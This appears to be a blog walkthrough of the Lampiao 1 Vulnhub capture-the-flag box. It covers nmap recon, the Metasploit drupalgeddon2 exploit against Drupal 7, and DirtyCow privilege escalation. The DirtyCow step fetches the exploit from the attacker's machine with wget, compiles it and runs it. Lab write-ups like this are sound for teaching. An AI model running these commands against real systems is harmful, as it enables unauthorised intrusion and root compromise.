Introduction ????????
In this post, You will learn how to CTF the Lampiao 1 box from vulnhub and below is the video format of the post, Check it out ????????
To download Lampiao 1 [Click here]
Video ????
Hacking Phases in Lampio
- Finding Target IP
- Nmap Scan
- Enumeration
- Exploit (msfconsole)
- Privesc
- Root
Let’s start
Hey you ❤️ Please check out my other posts, You will be amazed and support me by following on youtube.
https://www.youtube.com/@techyrick-/videos
Finding Target IP
To find the target IP lets use the below command or you can go with the net discover command.
sudo arp-scan -l
In my case the target IP is 192.168.65.33
![](http://techyrick.com/wp-content/uploads/2023/05/Screenshot-2023-05-29-at-1.09.27-PM-1024x307.webp)
Nmap
I have done a full port scan and OS and service scan.
![](http://techyrick.com/wp-content/uploads/2023/05/Screenshot-2023-05-29-at-1.25.07-PM-1024x720.webp)
We can see there are three ports open they are port 22, 80 and 1898 and the 1898 runs drupal.
So, let’s view the port 1898 in site.
![](http://techyrick.com/wp-content/uploads/2023/05/Screenshot-2023-05-29-at-1.32.46-PM-1024x619.webp)
So, It’s powered by drupal and its version is 7. We came to know the version when we have run the nmap scan.
So I though of exploiting it by using exploit drupal_drupalgeddon2.
Exploit
So, let’s exploit the target using msfconsole.
use unix/webapp/drupal_drupalgeddon2 set rhost 192.168.65.33 set rport 1898 exploit
![lampiao 1](http://techyrick.com/wp-content/uploads/2023/05/Screenshot-2023-05-29-at-1.36.33-PM-1024x366.webp)
We have got the access ????
shell python -c 'import pty;pty.spawn("/bin/bash")' lsb_release -a
Checking the latest release of the OS.
![lampiao 1](http://techyrick.com/wp-content/uploads/2023/05/Screenshot-2023-05-29-at-1.38.18-PM.webp)
Privesc
We have finally found the exploit that we were looking for and we have downloaded it on our machine.
Download the exploit
![lampiao 1](http://techyrick.com/wp-content/uploads/2023/05/Screenshot-2023-05-29-at-1.40.39-PM-1024x540.webp)
Now let’s upload the exploit to the target machine. Let’s start the python server.
python -m http.server 80
![](http://techyrick.com/wp-content/uploads/2023/05/Screenshot-2023-05-29-at-1.44.56-PM-1024x282.webp)
wget http://kali IP/40847.cpp g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil ./dcow su dirtyCowFun
![lampiao 1](http://techyrick.com/wp-content/uploads/2023/05/Screenshot-2023-05-29-at-3.02.04-PM.webp)
![lampiao 1](http://techyrick.com/wp-content/uploads/2023/05/Screenshot-2023-05-29-at-3.02.12-PM.webp)
Finally got the flag ❤️
Conclusion
In my opinion I would rate 1.5 out of 10 and it’s really a great box. You can learn some privilege escalation stuff. See you in the next post guys ❤️